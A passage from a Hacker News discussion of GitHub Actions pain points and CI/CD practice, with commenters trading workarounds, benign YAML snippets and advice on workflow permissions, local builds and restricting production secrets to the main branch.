It looks like they have a very specific and unique build process which they really should handle with something more customizable like Jenkins. Instead they're using something that's really intended for quick and light deployments for intense dev ops setup.
I really like GitHub actions, but I'm only doing very simple things. Don't call a fork bad because it's not great when you're eating soup
ohgr 7 days ago [-]
The only people who picked the right tool for the job are the people you don't hear about.
999900000999 7 days ago [-]
That's a good point. At least once a week someone decides that instead of reading the documentation and understanding the limitations of the technologies or frameworks they want to use...
They either write a long blog post about how they can't screw in nails with a hammer,
or they leave their security rules wide open, and about half the comments are like: we need tools which stop us from doing stupid things.
No other industry works like this.
timewizard 6 days ago [-]
We use GitHub actions. We have a single job step. It has an "if: false" property on it. When triggered the action immediately completes and no runners are engaged.
What it really does is fire off a webhook. Repository custom properties and the name of the action are included in the workflow_job webhook payload. With this you can do anything you want, and you're not at all constrained by YAML or runners.
lolinder 7 days ago [-]
> something more customizable like Jenkins
If they had, we'd be reading a different article about how terribly complex and unintuitive Jenkins is.
CI is just a very very hard problem and no provider makes it easy.
GauntletWizard 7 days ago [-]
Whenever I get mad at GitHub Actions, I refer to it by its true name: VisualSourceSafe Actions. Because that's what it is, and it shows. If you check out their Action Runner's source code[1], you'll find the VSS prefix all over, showing its lineage.
I know they've fixed VSS ages ago, but for many years it was buggy af and would catastrophically lose data on automerges that it confidently made and was wrong.
I had a coworker who called it Visual Sorta-Safe which is just about the best parody name I've ever heard in my entire career.
7 days ago [-]
rurban 7 days ago [-]
Oh, C#. Nice!
silverwind 7 days ago [-]
GHA is full of such obscure behaviours. One I recently discovered is that one action cannot trigger another:
If one action pushes a tag to the repo, `on:tag` does not trigger. The workaround apparently is to make the first action push the tag using a custom SSH key, which magically has the ability to trigger `on:tag`.
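The workaround in practice: check out with a deploy key (or a PAT) instead of the default `GITHUB_TOKEN`, so the pushed tag comes from a credential that is allowed to trigger workflows. A sketch, assuming a repo secret named `DEPLOY_KEY` holding the private half of a deploy key with write access:

```yaml
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Pushes made over this key are not attributed to GITHUB_TOKEN,
          # so an `on: push: tags:` workflow will fire for the new tag.
          ssh-key: ${{ secrets.DEPLOY_KEY }}
      - run: |
          git tag "v1.2.3"
          git push origin "v1.2.3"
```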
mook 7 days ago [-]
That actually seemed reasonable when I hit it, because you can easily accidentally have an action triggered on commit that makes a new commit, ending up in an infinite loop.
The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
joshstrange 7 days ago [-]
> The workaround is to use a token tied to you instead of GitHub Actions, so you get charged (or run out of quota).
You get charged no matter what, a personal access token doesn’t change anything.
If they are concerned about infinite loops, then put a limit on how many workflows can be triggered by another workflow. Each time a workflow chains off another, pass along some metadata like "runsDeep" and stop when that hits X, which can be configured.
No, requiring a PAT to kick off a workflow from a workflow is gross and makes zero sense. I don’t want every tag associated with my user, I want it to be generic, the repo itself should be attributed. The only way to solve this is to create (and pay for) another GH user that you create PAT tokens under. A bunch of overhead, cost, and complexity for no good reason.
> When you use the repository's GITHUB_TOKEN to perform tasks, events triggered by the GITHUB_TOKEN, with the exception of `workflow_dispatch` and `repository_dispatch`, will not create a new workflow run.
It has bitten me in the rear before too. I use this pattern a lot when I publish a new version, which tags a piece of code and then marks assets as part of that version (for provenance reasons I cannot rebuild code).
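For reference, the PAT workaround usually looks something like the sketch below. `RELEASE_PAT` is a hypothetical secret name and the tag is illustrative; the point is that a push made with a PAT, unlike one made with the default `GITHUB_TOKEN`, can trigger other workflows.

```yaml
# Sketch only: secret name and tag are illustrative.
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.RELEASE_PAT }}  # a PAT, not GITHUB_TOKEN
      - run: |
          git tag "v1.2.3"
          git push origin "v1.2.3"   # this push CAN trigger tag workflows
```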
geewee 7 days ago [-]
We're also struggling with this, as we'd love to e.g. just run a formatter and commit the changed code in CI rather than just fail the code.
jicea 7 days ago [-]
Genuine question: what's the GitLab equivalent of GitHub Actions?
I'm using GitHub Actions to easily reuse some predefined job setup (like installing a certain Python version on Linux, macOS, and Windows runners). For these types of tasks, I find GitHub Actions very useful and convenient. If you want to reuse predefined jobs, written by someone else, with GitLab CI/CD, what can I use?
include:component is usually what you want now: you can version your components (SemVer), add a nice readme, and it is somewhat integrated into the GitLab UI. Not sure about the other include: variants, but you can also define inputs for components and use them at arbitrary places like template variables.
Since the inclusion is done statically, GitLab can show you a view of the pipeline definition _after_ all components were included, but without actually running it.
We are using this and it is so nice to set up. I have a lot of gripes with other gitlab features (e.g. environments, esp. protected ones and their package registry) but this is one they nailed so far.
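For anyone who hasn't seen it, a component include looks roughly like this (the component path, version, and input name are invented for illustration):

```yaml
include:
  - component: gitlab.example.com/my-group/ci-components/python-setup@1.2.0
    inputs:
      python_version: "3.12"   # consumed by the component's spec:inputs
```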
never_inline 6 days ago [-]
Doesn't include:component still require all your shell scripts to be written inside YAML? Or is there a way to move the logic to, for instance, a .sh file and call it from YAML?
mdaniel 6 days ago [-]
I realize this may be splitting hairs, but pedantically there's nothing in GitLab CI's model that requires shell; it is, as best I can tell, 100% docker image based. The most common setup is to use "script:" (or its "before_script:" and "after_script:" friends) but if you wanted to write your pipeline job in brainfuck, you could have your job be { image: example.com/brainfuckery:1, script: "" } and no shell required[1]
I'd say write a Python CLI (or any language you're comfortable with) which does all the actions (setup, deploy), download it and use it in the CI (or install on the runner images if you control them). That way you can use same workflow (command) in local development and CI.
There is a GitLab CI feature `include`, but you pretty much have to write shell scripts inside YAML, losing the whole developer experience (shellcheck etc.). I would recommend this way only if you can't factor your code into a CLI in a proper language.
HdS84 7 days ago [-]
There is nothing.
Oh sure there is include, but that's like most gitlab features: it marks a nice shiny checkbox in some management presentation. But usefulness in the real world is limited.
But hey, let's do secops... no wait, AI instead!
ed_mercer 7 days ago [-]
Kaniko + base container images
ManBeardPc 7 days ago [-]
CI environments like GitLab or GitHub are my nemesis. Another technology that everyone swears is absolutely necessary but that somehow makes everything more complicated. The provided environments in companies so far have been hell 100% of the time, managed by inexperienced personnel with little or no programming experience.
* Barely reproducible because things like the settings of the server (environment variables are just one example) are not version controlled.
* Security is a joke.
* Programming in YAML or any other config format is almost always a mistake.
* Separate jobs often run in their own container, losing state like build caches and downloaded dependencies. Need to be brought back by adding remote caches again.
* Massive waste of resources because too many jobs install dependencies again and again or run even if not necessary. Getting the running conditions for each step right is a pain.
* The above points make everything slow as hell. Spawning jobs takes forever sometimes.
* Bonus points if everything is locked down and requires creating tickets.
* Costs for infra often keep expanding towards infinity.
We already have perfectly fine runners: the machines of the devs. Make your project testable and buildable by everyone locally. Keep it simple and avoid (brittle) dependencies. A build.sh/test.sh/release.sh (or in another programming language once it gets more complicated, see Bun.build, build.zig) and a simple docker-compose.yml that runs your DB, Pub-Sub or whatever. Works pretty well in languages like Go, Rust or TS (Bun). Having results in seconds even if you are offline or the company network/servers have issues is a blessing for development.
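As a sketch of that setup (service names and versions are arbitrary), the compose file stays small enough to read in one glance:

```yaml
# docker-compose.yml -- illustrative local dev dependencies only
services:
  db:
    image: postgres:16
    environment:
      POSTGRES_PASSWORD: dev   # throwaway credential for local use
    ports:
      - "5432:5432"
  pubsub:
    image: redis:7
    ports:
      - "6379:6379"
```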
There are still things like the mentioned heavy integration tests, merges to main, and the release cycle where it makes sense to run them in such environments. I'm just not happy with how these CI/CD environments work and are used currently.
riperoni 7 days ago [-]
To be honest, some of your points can be a hindrance, but as a GitLab user, others are solvable without massive effort.
- env vars can be scripted, either in YAML or through dotenv files. Dotenv files would also be portable to dev machines
- how is security a joke? Do you mean secrets management? Otherwise, i don't see a big issue when using private runners with containers
- jobs can pass artifacts to each other. When multiple jobs are closely intertwined, one could merge them?
- what dependency installation do you mean? You can use prebuilt images with dependencies for one. And ideally, you build once in a pipeline and use the binary as an artifact in other jobs?
- in my experience, starting containers is not that slow with a moderately sized runner (4-8 cpus). If anything, network latency plays a role
- not being able to modify pipelines and check runners must be annoying, I agree
- everything from on-prem license to SaaS license keeps costing more. Somewhere, expenses are made, but that can be optimized if you are in a position to have a say?
By comparing dev machines to runners, you miss some important aspects: portability, automation, and testing in different environments. Unless you have a full container engine on your dev machine with flexible network configs, issues can be missed.
Also, you need to prime every dev to run the CI manually or work with hooks, and then you can have funny, machine-specific problems. So this already points to a central CI system that makes builds repeatable in the same from-scratch environment.
As for deployment, those shouldn't be made from dev machines, so automated pipelines are the go-to here.
Also, automated test reporting goes out the window for dev machines.
ManBeardPc 7 days ago [-]
TLDR: True, most things can be fixed if configured and set up properly. It's just that the way they are often used, and the provided examples, encourage many of the problems.
Env vars can be scripted; many companies use a tree of instance/group/project-scoped vars though, which makes it easy to break some projects when things higher up change. Solvable for sure, but company guidelines make it a pain. There are other settings like allowed branch names etc. that can break things.
With security, yes I mean mostly secrets management. Essentially everyone who can push to any branch has access to every token. Or just having a typo or mixing up some variables lead to stuff being pushed to production. Running things in the public cloud is another issue.
Passing artifacts between jobs is a possibility. It still leads to data being pushed between machines. Merging jobs is also possible, but it defeats the purpose of having multiple jobs and stages. The examples often show a separation between things like linting, testing, building, uploading, etc., so people split it up.
With dependencies I mean everything you need to execute jobs: OS, libraries, tools like curl, npm, poetry, jfrog-cli, whatever. Prebuilt images work, but they are another thing you have to do yourself: building more containers, storing them, downloading them. Also, containers are not composable, so each project or job has its own. The curse of being stateless and the way Docker works.
Starting containers is not slow on a good runner. But I noticed significant delays on many Kubernetes clusters, even if the nodes are <1% CPU. Startup times of >30s are common. Still, even if it would be faster it is still a delay that quickly adds up if you have many jobs in a pipeline.
I agree that dev machines and runners have different behavior and properties. What I mean is local-first development. For most tasks it is totally fine to run a different version of Postgres, Redis, and Go, for example. Docker containers bring it even closer to a realistic setup. What I want is quick feedback and being able to see the state of something when there are bugs. Not needing to do print debugging via git push and waiting for pipelines. Pipelines that set up a fresh environment and tear it down after are nice for reproducibility, but prevent me from inspecting the system aside from logs and other artifacts. Certainly this doesn't mean you shouldn't have a CI/CD environment at all, especially for releases/production deployments.
z3t4 7 days ago [-]
It's such a waste of resources to rebuild an operating system every time you want to run some tests, and these CI machines are much less powerful than personal computers, so it takes much longer in the cloud too.
If you keep your CI in your own scripts it will be easy to migrate between CI environments too: build: ./build.sh, test: ./test.sh, deploy: ./deploy.sh, and maybe pass some env variables to the scripts.
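In GitHub Actions terms, that thin wrapper could look like the sketch below (the script names come from the comment above; the branch condition and env var are illustrative):

```yaml
name: ci
on: [push]
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./build.sh
      - run: ./test.sh
      - run: ./deploy.sh
        if: github.ref == 'refs/heads/main'
        env:
          DEPLOY_ENV: production   # example of passing env vars through
```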
There are some advantages to CI platforms, like nightly build/test and automatic security scan on already deployed software, so that you will be notified when something suddenly stops working or a vulnerability is discovered.
ManBeardPc 7 days ago [-]
The resource usage is really a big problem (if you don't sell them). Being stateless is a blessing and curse at the same time. Reproducible but forces you to feed in all required data every time.
Simple scripts like these are enough for most projects and it is a blessing if you can execute them locally. Having a CI platform doing it automatically on push/merge/schedule is still possible and makes migrations to other platforms easier.
mab122 7 days ago [-]
but then, but then your corporate-provided laptop with 8GB RAM and a 128GB disk running locked-down Windows Enterprise™ may need a thousand security policy exceptions and won't even fit all dependencies on its disk. Not to mention that it would be building for like 10h. Think of the shareholders! The corporation would have to buy actually usable hardware for its workers! Think of the cost! /j
For real though, not every project can be built by everyone locally, but at least parts of it should be locally runnable for devs to be able to work (at all, IMO).
What I am noticing is that more and more coding is being done on some server somewhere (GitHub Codespaces, anyone? Google Colab? etc.).
What I am also noticing is that with tools like GH-A there is not really a way to test the CI code other than... commit, push, wait, commit, push, wait...
That's just absurd to me. Obviously all CIs have some quirks where sometimes you have to _just run it_ and see if it works, but here... it's like that for everything! Absurd, I say!
ManBeardPc 7 days ago [-]
True, many of the problems are not solvable by technology alone. Hostile environments can be created for every approach if the corporation doesn't know/care how to do it properly. Luckily my employers have mostly given me admin permissions on my machine and provided decent hardware. The hardware my customers force me to use though... let's say at least I have some free time for other things.
Laptops are a lot cheaper than the cloud bills I have seen so far. Penny-pinching every tiny thing under $100/€, but cloud seems to run on an infinite magic budget...
drpossum 7 days ago [-]
Why even do automated testing too? Devs should just test their code. If they were doing their jobs there would be no bugs./s
Your opinions are so regressive you really should consider going into management.
ManBeardPc 7 days ago [-]
What about being able to run stuff locally even hints towards me having such an opinion? The processes including tests and release are still automated, the trigger and where they run are different.
Nowhere do I say you shouldn't use CI/CD at all. I just don't like the current CI/CD implementations and the environments/workflows companies I worked for so far provide on top of them.
The regressive thing is putting everything ONLY on a remote machine with limited access and control, taped together by a quirky YAML-based DSL as a programming language and still requiring me to program most stuff myself.
rejschaap 7 days ago [-]
We've all been there:
$ git l
* cbe9658 8 weeks ago rejschaap (HEAD -> add-ci-cd) Update deploy.yml
* 0d78a6e 8 weeks ago rejschaap Update deploy.yml
* e223056 8 weeks ago rejschaap Update deploy.yml
* 8e1e5ea 8 weeks ago rejschaap Update deploy.yml
* 459b8ea 8 weeks ago rejschaap Update deploy.yml
* a104e80 8 weeks ago rejschaap Update deploy.yml
* 0e11d40 8 weeks ago rejschaap Update deploy.yml
* 727c1d3 8 weeks ago rejschaap Create deploy.yml
mcdeltat 6 days ago [-]
This is a fascinating read as someone who is currently working on migrating CI platforms. We deal with hundreds of internal repos where many CI platforms just don't scale well. We are probably going to choose Github Actions because it looks like the simplest, least-BS option. The problems the author mentions would be the least of our concerns.
Totally agree with other comments saying to keep as much logic out of CI config as possible. Many CI features are too convoluted for their own good. Keep it really simple. You can use any CI platform and have a shit time if you don't take the right approach.
jFriedensreich 7 days ago [-]
I am completely switching my mental model of what a ci/cd system should be at the moment: i use docker compose for absolutely everything possible. unit tests? runs as part of the container build. linear build-dependent steps? multi-stage docker build. DAG of build steps? dependencies in docker compose. This way every developer has the same system that ci/cd uses locally. debugging the dev setup is the same as debugging the ci/cd. The purpose of the actual ci/cd is reduced to handling/configuring triggers, handling env vars/secrets and triggering the docker compose command with the proper selected docker context
This also reduces the lock in by orders of magnitude.
heldrida 6 days ago [-]
Sounds like a good option. I’ll try something similar next time.
peterldowns 7 days ago [-]
These are all real pains, author definitely has done a lot of work in Github Actions; respect. I'm sure these notes will save a lot of people a lot of frustration in the future, since Github Actions isn't going away --- it's too damn convenient.
I wonder why they chose to move back to Github Actions rather than evaluate something like Buildkite? At least they didn't choose Cloud Build.
ZeWaka 7 days ago [-]
Yep, I've run into every one of these issues in my time working with the CI. It's still leagues beyond the old Azure DevOps pipelines or god forbid, Jenkins.
I think incremental progress in the CI front is chugging along nicely, and I really haven't seen any breathtaking improvements from other solutions I've tried, like CircleCI.
dboreham 7 days ago [-]
There's a meta-problem here: GitHub Actions is one of those things that, when you first encounter it, is presented as: "we've got it all figured out and goin' on here, and anyone who is scratching their head must be dumb". This pattern, in my experience, shows up frequently in the software realm. Then there typically follows some period where you try to do whatever you need to do by reading docs and copying what you see others do. Frustration and head scratching grow, finally culminating in a process of "OK, WTF are the core concepts of this thing, what were they thinking when they designed it, what is really going on???"
The article is what you end up finding after that stage has been gone through.
The conclusion of course is that whoever invented this stuff really wasn't thinking clearly and certainly didn't have the time to write decent documentation to explain what they were thinking. And now the whole world has to try to deal with their mess.
My theory as to how this ends up happening is that the people creating the thing began with some precursor thing as their model. They made the new thing as "old thing, with a few issues fixed". Except they didn't fully understand the concepts in that thing, and we never got to see that thing. You'll see many projects that have this form: bun is "yarn fixed". Yarn is "npm fixed". And so on. None of these projects ever has to fully articulate their concepts.
lemagedurage 7 days ago [-]
I wonder if the complexity of fixing trivial code mistakes in CI is worth it compared to catching them in a pre-commit hook.
matharmin 7 days ago [-]
In my opinion neither hooks nor CI should ever make changes to code automatically. When I commit changes, I want to see exactly what I commit, and not have some system change it at the last minute.
Instead, have tooling to do that before committing (vscode format-on-save, or manually run a task), then have a pre-commit hook just do a sanity-check on that. It only needs to check modified files, so usually very fast.
Then, have an additional check on CI to verify formatting on all files. That should rarely be triggered, but it helps to catch cases where the hooks were not run, for example from external contributors. That also makes it completely fine for this CI step to take a couple of minutes - you don't need that feedback immediately.
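A minimal sketch of that pre-commit sanity check, assuming Python files and `black` as the formatter (both assumptions, not from the comment); it only looks at staged files, so it stays fast:

```python
# Hedged sketch: verify formatting of staged files only, failing the
# commit instead of rewriting anything. "black" is an assumed formatter.
import subprocess
import sys


def pick_staged(listing, ext=".py"):
    """Filter `git diff --cached --name-only` output down to one extension."""
    return [f for f in listing.splitlines() if f.endswith(ext)]


def main():
    out = subprocess.run(
        ["git", "diff", "--cached", "--name-only", "--diff-filter=ACM"],
        capture_output=True, text=True, check=True,
    ).stdout
    files = pick_staged(out)
    if not files:
        return 0  # nothing staged that we care about
    # --check reports problems without modifying the working tree
    return subprocess.call([sys.executable, "-m", "black", "--check", *files])


if __name__ == "__main__":
    sys.exit(main())
```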
hinkley 7 days ago [-]
The tension in any system is how many ways the build can fail other than the most obvious one. So I generally only encourage things in the pre-commit hook like no weird punctuation (I'm looking at you, Microsoft), no empty commit messages, and maybe require a ticket number (or try to guess one out of the branch name).
Though it would be sort of interesting or maybe just amusing if you made something like ssh-agent but for 'git commit' and your test runner. Only allow commits when all files are older than your last green test run.
yeswecatan 7 days ago [-]
Unfortunately people will use --no-verify to bypass hooks.
normie3000 7 days ago [-]
I don't understand commit hooks - they're like binding a macro to the MS Word save button to make it conditional.
chuckadams 7 days ago [-]
> like binding a macro to the MS Word save button to make it conditional
You have no idea how much I'd love that feature. Inasmuch as "save" is still a thing anyway. I don't miss explicit saves in IDEA, I see commit as the "real" save operation now, and I don't mind being able to hook that in an IDE-independent way.
I think the UX of git hooks has been sub-par for sure, but tools like the confusingly named pre-commit are helping there.
sgarland 7 days ago [-]
Because if you haven’t auto-formatted, linted, etc., then it’s a very easy way to do that so you don’t waste time watching CI fail for something stupid like trailing comma placement.
I don’t want to think about formatting, I just want everything to be consistent. A pre commit hook can run those tools for me, and if any changes occurred, it can add them to the commit.
hinkley 7 days ago [-]
There's a long set of steps to making a tool mandatory in a development environment, but the final step should always, always be, "And you will find yourself on a PIP if you refuse to use the mandatory tools."
If people want to die on a hill that is demonstrably causing problems for all of their coworkers then let em.
yeswecatan 7 days ago [-]
Oh how I wish engineering leadership would actually mandate certain things such as this.
hinkley 7 days ago [-]
They always pick the wrong things to mandate don't they.
anttiharju 7 days ago [-]
Enforce on CI. Autofix in pre-commit hooks. Lefthook is fantastic for this.
Then they'll lose time when the same verifications fail in the PR?
ahub 7 days ago [-]
I don't see sourcehut [0] mentioned here. I tested GitHub and GitLab CI; sourcehut is MILES ahead. I'll drop two key features here:
- any CI run, successful or not, gives you back an SSH URI so you can log into the machine to inspect/tweak/tinker
- CI files are NOT in the project's repository. No need to wrangle with your git branches when working on CI anymore
I don't use sourcehut, but interpreting what you wrote I'd argue this is an antifeature and would be a dealbreaker for me. CI typically evolves with the underlying code and decoupling that from the code makes it difficult to go backwards. It loses cohesion.
enriquto 7 days ago [-]
you can put them in the same repository, if that is your thing.
If you put the build files in a .builds/ folder at the root of your repository, they will be run upon each commit. Just like in github or gitlab. You are just not forced into this way of life.
If you prefer, you can store the build files separately, and run them independently of your commits. Moreover, the build files don't need to be associated to any repository, inside or outside sourcehut.
terminalbraid 7 days ago [-]
I see, that is nice. Thank you for the patient explanation.
yoyohello13 7 days ago [-]
My team uses GitLab and most other teams are on Azure dev ops. They keep trying to get us to switch telling us how amazing pipelines are. Glad to know we are not missing anything.
Xiol32 7 days ago [-]
Having recently been involved in a Gitlab to ADO migration, keep fighting the fight. It is such a step backwards.
Azure DevOps seems extremely basic (and flaky!) compared to GitLab. My impression is from a couple of years ago though; perhaps it's amazing now.
LilBytes 7 days ago [-]
ADO is painful, GitHub has its warts but it's got much more community support from services like depot.dev and others.
lxe 7 days ago [-]
Should have been zero permissions by default. The current model is a mess of global settings, workflow permissions, and job tokens that nobody understands.
quantadev 7 days ago [-]
GitHub Actions is just a way to build a remote single point of failure into your pipeline. I don't get why people do this. If GitHub goes down, or has problems for whatever reason, it can interfere with your deliverables to customers. I learned early in my career not to trust 3rd parties as any part of any mission-critical process. 3rd parties will always fail you, it's just a matter of time.
kelseydh 7 days ago [-]
With widespread dependencies like AWS or Github, if they go down.. you benefit from everybody else also going down. Downtime of that kind means a lot of media coverage and an easier/more understanding conversation with your affected customers.
The worst kind of downtime is when you go down but nobody else has.
neuroelectron 6 days ago [-]
Is your argument, literally, "everybody else is doing it?"
quantadev 6 days ago [-]
I think it was all about "having excuses" for one's bad decisions, to avoid taking responsibility. lol.
quantadev 7 days ago [-]
[flagged]
zzo38computer 7 days ago [-]
I only use GitHub Actions for auto assigning issues (and I never merge pull-requests directly; I will always handle pull-requests manually). Here is the entire file:
I set the permissions to only allow writing to issues and pull-requests (so that if gh is modified to do malicious things (or has a security flaw that allows it to do malicious things even if not intended), it cannot affect anything other than issues and pull-requests). As far as I can tell from the documentation, this is correct (although it can do things other than add assignees, and it does not seem that permissions can be set more finely), but if I am wrong then you can tell me that I am wrong.
Documentation for GitHub Actions says, "If you specify the access for any of these permissions, all of those that are not specified are set to none." The article says "I do think a better "default" would be to start with no privileges and require the user to add whatever is needed", and it would seem that this is already the case if you explicitly add a "permissions" block to your GitHub Actions file. So it would seem that the "default permissions" are only used if you do not add the "permissions" block, although maybe that is not what it means and the documentation is confusing; if so, then it should be corrected. Anyway, you can also change the default permission setting to restrictive or permissive (and it probably ought to be restrictive by default).
Allowing to set finer permissions probably would also help.
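The setup described above (the commenter's actual file isn't shown here) would amount to something like this; per the documentation quoted above, listing any permission explicitly sets all unlisted ones to none:

```yaml
# Sketch of the described permissions block; all unlisted scopes
# (contents, packages, etc.) become "none" once any are specified.
permissions:
  issues: write
  pull-requests: write
```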
stephencoxza 7 days ago [-]
Not sure if I'm the odd one out here. I thoroughly enjoy making the best of whatever the company wants to use. The flavour of CI/CD can be a debate similar to programming languages
darkwater 7 days ago [-]
I think it's even worse. Just like ticketing systems, people love to dump on CI/CD because it's out of the scope of their primary focus (writing software), so having to deal with it is a PITA. The only CI/CD systems most people like are the ones that are almost invisible.
neycoda 7 days ago [-]
1st mistake: rebasing in CI.
Stop rebasing.
This should only happen if absolutely necessary to fix major merge mistakes.
Rebasing changes history, and I've seen more problems prevented by removing it as a CI strategy.
Every CI strategy I've seen relying on rebasing had a better alternative in SDLC. You just need to level up your project management, period.
wordofx 7 days ago [-]
GHA feels like a discontinued product that people use so they can’t switch it off.
webworker 7 days ago [-]
Yeah, between the two, I strongly prefer BitBucket Pipelines. Feels much cleaner.
jiggawatts 7 days ago [-]
Azure DevOps is nearly identical, but with slightly different zoo of issues that are less well documented in public sources.
It also has the problem of not having a local dev runner for actions. The "inner loop" is atrociously slow and involves spamming your colleagues with "build failed" about a thousand times, whether you like it or not.
IMHO, a future DevOps runner system must be open-source and local-first. Anything else is madness.
Right now we're in the "mainframe era" of DevOps, where we edit text files in baroque formats with virtually no tooling assistance, "submit" that to a proprietary batch system on a remote server that puts it into a queue... then come back after our coffee to read through the log printout.
I should buy a dot matrix printer to really immerse myself into the paradigm.
asmor 7 days ago [-]
They are so identical, there's code in the GitHub runner to search and replace "Azure DevOps" with "GitHub Actions" in log output on the fly.
The entire code is a wonderful mess. We found, when we early-adopted ephemeral runners, that the control flow is full of races and the status code you get at the end is indicative of exactly nothing. So even if the backend is just having a hiccup picking up a job with an obscure Azure error code, you better just throw that entire VM away, because you can't know if that runner will ever recover or has already done things to break the next run.
rochacon 7 days ago [-]
The current version of GHA is "Azure DevOps v3".
IIRC, it came after Microsoft purchased GitHub, and I think it was part of a plan to discontinue/kill Azure DevOps altogether in favor of GitHub. I don't think they have feature parity yet, especially on the issues and permissioning parts.
Although I never saw a public announcement of this discontinuation, ADO is kind of abandoned AFAICT, and even their landing page hints to use GitHub Enterprise instead [1].
We recently discovered that if the last person to change the cron __schedule__ of a workflow is removed from the organization, the workflow fails with cryptic errors.
It turns out, the last person to change cron __schedule__ (not the workflow file in general) is an 'actor' associated with this workflow. Very, very confusing implementation. Error messages are even more confusing - workflow runs are renamed as "{Unknown event}" and the message is "Email is unverified".
Things like this are why I hate having to use PATs in workflows. What if I leave the company? I'd leave a trail of broken actions in my wake. I do not like that at all; a huge point of CI/CD is automation, reproducibility, and NOT being dependent on specific developers/machines.
quesera 7 days ago [-]
I believe this is a good use for a GitHub machine account.
IIRC, GitHub recommends this practice in their docs, with a username of "YOUR_USERNAME-machine".
The machine user is just an ordinary GitHub user, added as a member of the organization, with all the necessary repo permissions, and a generated access token added to the GH repo Secrets. The organization owner then manages this GH machine account as well as the org, and their own personal (or work) login account.
We have not hit any rate limiting so far, but we're a relatively small team -- a dozen devs, a few hundred commits per day that trigger CI (we don't do CD), across half a dozen active repos.
goosejuice 7 days ago [-]
After using Gitlab CI for years and setting up some pretty complex scenarios, when I switched over to GitHub I found the UX to be pretty rough. Seems very opaque and I find the documentation to be at best hard to navigate.
Maybe it was just the pain of switching but that was my initial impression.
heldrida 6 days ago [-]
GitHub Actions provides the best experience I have encountered when dealing with ops.
I pair it with bash scripts where it's important to be able to run things outside GitHub, which facilitates testing and maintenance.
Still, I often need to run a workflow multiple times and iterate against actual GitHub Actions runs, which is slow, but I find it the best way to catch issues. If the dev feedback loop were fixed it would save me a lot of precious time. I know there's a third-party tool to run actions locally, but it's not the same...
Thus, bash scripting is great due to its portability.
actinium226 7 days ago [-]
As another commenter said, it's good to write as much CI logic outside the yaml file as possible.
I take this a step further and approach CI with the mentality that I should be able to run all of my CI jobs locally with a decent interface (i.e. not by running 10 steps in a row), and then I use CI to automate my workflow (or scale it, as the case may be). But it always starts with being able to run a given task locally and then building CI on top of it, not building it in CI in the first place.
dilawar 7 days ago [-]
If you are annoyed by gitlab-runner deprecating the command I used to run pipelines locally, there is https://github.com/firecow/gitlab-ci-local . But it also opened my eyes to the benefits of having runner-invariant pipelines -- pipelines written in a solution-agnostic way. Use bash, make, just, doit or whatever.
Nothing beats having a single script to bootstrap and run the whole pipeline e.g. `make ci`.
fourteenminutes 7 days ago [-]
Used to use GH actions quite a bit. At my current company we set up RWX Mint (rwx.com/mint) and haven't looked back. (disclaimer: used to work at rwx but no longer affiliated)
lars512 7 days ago [-]
At Our World In Data we ended up using Buildkite to run custom CI jobs, integrated with GitHub, but on cheap, massive Hetzner machines. I can really recommend the experience!
youdont 7 days ago [-]
When GitHub Actions are stopped, GitHub just goes straight for the nuclear SIGKILL. No asking nicely first with a SIGTERM...
This means that for anything that needs to gracefully cancel, like for example terraform, it's screwed.
Want to cancel a run? Maybe you've got a plan being generated for every commit on a branch, but you push an update. Should be ok for GitHub to stop the previous run and run the action for the updated code, right? WRONG! That's a quick way to a broken state.
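To make the SIGTERM/SIGKILL distinction concrete, here's a minimal sketch (nothing GitHub-specific, and the messages are invented): a trap handler like this gets a chance to run on SIGTERM, but SIGKILL cannot be trapped at all, so on an Actions cancel none of the cleanup ever fires.

```shell
#!/bin/sh
# Graceful-shutdown sketch: cleanup runs when we receive SIGTERM...
CLEANED=0
cleanup() {
  CLEANED=1
  echo "releasing state lock, finishing in-flight writes"
}
trap cleanup TERM

kill -TERM $$   # simulate a polite cancellation: the trap fires
# ...but SIGKILL bypasses traps entirely, which is why a killed
# `terraform apply` can leave locks and half-written state behind.
```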
joshstrange 7 days ago [-]
> Why do I need a custom token? Because without it, the release completes, but doesn't trigger our post-release workflow.
This is so frustrating. Having to inject a PAT into the workflow just so it will kick off another workflow is not only annoying, it just feels wrong. Also, now lots of operations are tied to my user, which I don't like.
> It doesn't help that you can't really try any of this locally (I know of [act](https://github.com/nektos/act) but it only supports a small subset of the things you're trying to do in CI).
This is the biggest issue with GH Actions (and most CIs), testing your flows locally is hard if not impossible
All that said I think I prefer GH Actions over everything else I've used (Jenkins and GitLab), it just still has major shortcomings.
I highly recommend you use custom runners. The speed increase and cost savings are significant. I use WarpBuild [0] and have been very happy with them. I always look at alternatives when they are mentioned but I don't think I've found another service that provides macOS runners.
Just flagging that Depot now has macOS and Windows runners [0] as well if you're looking for even faster builds. I also recognize that constantly reevaluating runners isn't on everyone's priority list.
If you have complex multi-step actions I recommend tools like nx (for frontend projects) or Bazel. It massively simplifies caching parts of your CI workflows and works locally too.
We have a very complicated build process in my current project, but our CI pipelines are actually just a couple of hundred of lines of GHA yaml. Most of which are boilerplate or doing stuff like posting PR comments. The actual logic is in NX configuration.
kelseydh 7 days ago [-]
We recently had a developer -- while messing around with GitHub Actions workflow files in their pull request (not main) to debug container builds for a version upgrade -- accidentally trigger a deployment of their local branch's Docker container to production (!).
Outside of locking down edit access to the .github workflow yml files I'm not sure how vulnerabilities like this can be prevented.
carderne 7 days ago [-]
Your prod deployment should require access to some secrets that are only available to workflows running against main.
kelseydh 7 days ago [-]
I'm interested in learning more about this. How would we go about adding a secret only available to runners on the main branch? Is there a configuration option on Github to create a secret only available to runners on main?
Presumably anything configured via a .github workflow wouldn't assure safety, as those files can be edited to trigger unexpected actions like deploys on working branches. Our Github Action workflow yml file had a check to only deploy for changes to the main branch. The deploy got triggered because that check got removed from the workflow file in a commit on a working branch.
carderne 7 days ago [-]
The docs here [0] do a decent job explaining it.
You create an environment, restrict it to the main branch, add your secret to it and then tie your deploy workflow to it.
If someone runs that workflow against another branch it will run but it won’t be able to access those secrets.
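For reference, a sketch of what the deploy side can look like (file name, script, and secret name are all placeholders). The `production` environment itself is configured in the repo's settings with a deployment branch rule allowing only `main`; per the behavior described above, a run from any other branch can't resolve the environment's secrets:

```yaml
# .github/workflows/deploy.yml -- illustrative only
name: deploy
on:
  push:
    branches: [main]

jobs:
  deploy:
    runs-on: ubuntu-latest
    environment: production   # gated in repo settings: main only
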